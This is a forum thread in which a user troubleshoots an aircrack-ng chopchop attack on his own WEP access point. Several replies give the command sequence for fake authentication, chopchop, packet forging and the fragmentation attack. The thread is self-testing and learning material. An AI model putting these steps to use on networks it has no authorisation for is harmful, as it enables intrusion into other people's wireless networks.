
Thread: [SOLVED]Need help on chopchop attack

  1. #1
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default [SOLVED]Need help on chopchop attack

    Greetings everyone,

    After I saw the videos from xploitz, I tried a chopchop attack myself on my AP, a NETGEAR WG602v4, using an Asus WG167L USB card; the driver in use is rt73. I tested with aireplay-ng --test -B rausb0 and it is working, but when I go to use aireplay-ng -4 (chopchop) I get this:

    Offset 41 (81% done) | xor = A6 | pt = 09 | 46 frames written in 138ms
    Offset 40 (84% done) | xor = C0 | pt = 6C | 250 frames written in 749ms
    Sent 966 packets, current guess: C2...

    The AP appears to drop packets shorter than 40 bytes.
    Enabling standard workaround: IP header re-creation.
    This doesn't look like an IP packet, try another one.

    Warning: ICV checksum verification FAILED! Trying workaround.


    The AP appears to drop packets shorter than 40 bytes.
    Enabling standard workaround: IP header re-creation.
    This doesn't look like an IP packet, try another one.

    Workaround couldn't fix ICV checksum.
    Packet is most likely invalid/useless
    Try another one.

    Saving plaintext in replay_dec-1010-210809.cap
    Saving keystream in replay_dec-1010-210809.xor

    Completed in 19s (2.11 bytes/s)

    Trying to figure out what I'm not doing correctly.

  2. #2
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    17

    Default

    Did you install the driver? Correctly?

    www.aircrack-ng.org/doku.php?id=rt73


    What command line are you using?

  3. #3
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    I'm using the ASPJ 1.1.0 driver for RT73,

    using the following line:

    aireplay-ng -4 -h aa:aa:aa:aa:aa:aa -b (AP MAC) rausb0

    while I'm running the fake authentication in the other window:

    aireplay-ng -1 20 -a (AP MAC) -h (FAKE MAC) rausb0

  4. #4
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    17

    Default

    You don't need to run fake auth at the same time.

    Run fake auth once, like this:


    aireplay-ng -1 0 -a (AP MAC) -h (FAKE MAC) rausb0




    Did you restrict the AP channel?

    airmon-ng start rausb0 (CHANNEL)



    Does fake auth succeed?

  5. #5
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    Try this: aireplay-ng --chopchop -m 68 -n 256 ...........................

    -m 68 specifies minimum packet size
    -n maximum packet size .....

    If you are using 1.0, add -F; you won't need to select packets, it will be autoselected.....

    Are you sure you are on the right channel?

    Have you lowered your rate to 1M?
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  6. #6
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    Did the test again, making sure I'm on channel 10, the same as my AP, and lowered the rate to 1M. In order, I do:

    ifconfig rausb0 down
    airmon-ng stop rausb0
    then
    ifconfig rausb0 up
    airmon-ng start rausb0 10
    iwconfig rausb0 rate 1

    Then in window no. 1, running airodump-ng -c 10 -w file rausb0

    Window no. 2, doing aireplay-ng -1 0 -a (AP MAC) -h (FAKE MAC CLIENT) rausb0

    then aireplay-ng -4 -F -h (FAKE MAC CLIENT) -b (AP MAC) rausb0


    I'm running BT on an HD installation with the latest aircrack-ng beta 1.0 r784, downloaded and installed thanks to your utilities, shaman.

    Did the test and I'm getting the same error.

  7. #7
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    Updated the driver to ASPJ 2.0.0 and did the test, but still nothing; getting the same error...

  8. #8
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    17

    Default

    Don't airodump while you chopchop, why are you doing this?

    Get the mac address, use fake auth, then chopchop, then packetforge and aireplay with airodump.

    You don't need to keep airodump running.

  9. #9
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    Quote: Originally Posted by throat
    Don't airodump while you chopchop, why are you doing this?

    Get the mac address, use fake auth, then chopchop, then packetforge and aireplay with airodump.

    You don't need to keep airodump running.

    I also tried not running airodump-ng while I use fake auth and when I use the other commands, but it looks like the problem persists... Actually, I am going to try with a different AP. Probably for some reason the chopchop attack is possible only on some APs and mine is not on that list...

    Any other ideas are pretty welcome.

  10. #10
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    Try the -5 attack instead .....

    (fragmentation)

    The ICV message means that the chopchop attack will fail with this AP.
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006
